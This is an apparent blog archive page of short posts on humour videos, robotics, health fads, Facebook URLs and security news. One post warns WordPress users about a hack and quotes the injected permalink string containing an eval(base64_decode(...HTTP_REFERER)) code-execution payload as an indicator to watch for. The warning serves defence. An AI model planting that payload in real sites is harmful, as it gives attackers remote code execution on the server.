Screenshot
The internet is… a man… with strange thumbs
After years of thinking the Internet was a collection of tubes, we now have a more definitive explanation, in video form…
Black holes, LHC, Star Wars, quantum uncertainty… if it is of general geek interest, but doesn’t fit into one of the other categories, it lands here.
Ewoks gone mad
The folks on the Today Show have discovered a little known fact about the Ewoks from Star Wars. They really can't handle their booze very well... https://youtu.be/LQ0S0BUE0zg?si=oNPEXxDNvtFzTNCI Apparently the folks…
Apple really likes those adjectives…
I found this on Gizmodo today, and when I watched the video I couldn't help laughing out loud... It is really awesomely incredibly great and unbelievable! The video is extracted…
WordPress SQL injection hack: watch for=> %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
If you are running a WordPress based blog like I am and suddenly notice your post URLs have something “extra” appended (see the subject line), your blog has been hacked.
You can read more about it here (thanks, UCLABoyz, thanks schang!), where you will also find guidance regarding cleaning the problem up. Unfortunately, it appears that the hack works on all versions of WordPress up to and including the most recent.
I have BadBehavior installed on my blog, and so it was rejecting the URLs with this addition which I *think* would be thwarting the hackers involved: they hadn’t been able to create an administrative user. Unfortunately, it also meant none of my blog posts were working properly until I noticed the problem and corrected it.
Hopefully WordPress will issue a fix for this soon- in the mean time, keep an eye on your URLs, WordPress bloggers!
UPDATE: Another link to a lengthy thread regarding this hack on the WordPress.org site. What is interesting here is the apparent vector: a weakness in the WordPress code, apparently up to and including the most recent release, that permits an ordinary subscriber (i.e.: not an administrative user) to run some administrator features e.g.: changing the permalinks.
UPDATE #2: it appears that updating to the most recent version of WordPress (2.8.4) removes the “double slash” vector for running some admin commands (notably permalink.php). This fix was apparently added somewhere between WordPress version 2.8 and 2.8.4.
I’ve included some extracts from my server logs and further thoughts below…
Do you wanna date my avatar?
I have caught a number of episodes of The Guild, a web-based video series since it first appeared a year or so ago. Imagine a soap opera based on the…
Robotic dexterity
The progress of robotics over the last few decades has seemed fairly slow to me. Robots today at their best seem to shuffle or stumble along like zombies, their movements…
Cyberwar? No, malicious script kiddy
According to the lead Republican on the House Intelligence Committee, Peter Hoekstra, the U.S. should launch an all out retaliation against North Korea for their role in the recent cyber attacks on American and South Korean internet targets. Unfortunately for the American people, Mr. Hoekstra is either an idiot, willfully ignorant, or intentionally twisting reality for his own political ends. The best experts in the industry agree that the attacks were launched by an attention-seeking amateur.
Warning: Fake twitter invites
Twitter has become popular enough now that the bad guys are starting to use it to get past your defenses. Beware of any invitations you may receive in your email…
New age health: Neti pot and Salt crystal lamps
I’m not really a gullible person. I tend to prefer claims backed up by multiple reputable research sources. That said, I am willing to try things that are a bit “out there” if the potential negatives are balanced out sufficiently. I mean, even if something doesn’t really work, if it does little or no harm it may help purely via the placebo effect.
This brings me to a couple of things I’ve invested in recently. The first actually has a fair amount of supporting medical research to support it. The second is pretty much debunked. Yet I’ve adopted both into my life, well aware of the limitations of each. I’m referring to the use of neti pots (or nasal lavage) to improve sinus health, and the second is the use of Himalayan salt lamps.
Facebook landrush: 3 million names registered in first day
I’m not really a Facebook user. I set up an account sometime in 2007, and then promptly forgot my login ID and password. Nothing about Facebook really appealed to me: I’m not sure why, perhaps at least partly because a lot of what it does I had already more or less been doing for a decade with my own website/blog.
However, I heard a few weeks ago that the Facebook folks were going to start allowing people to set up personal or “vanity” urls. So instead of “http://www.facebook.com/profile.php?id=39395883”, you could have something like “http://www.facebook.com/cooldude”. I thought I should probably lay claim to some kind of recognizable URL, and so I dug through my old notes and tried to dredge up my old Facebook account information.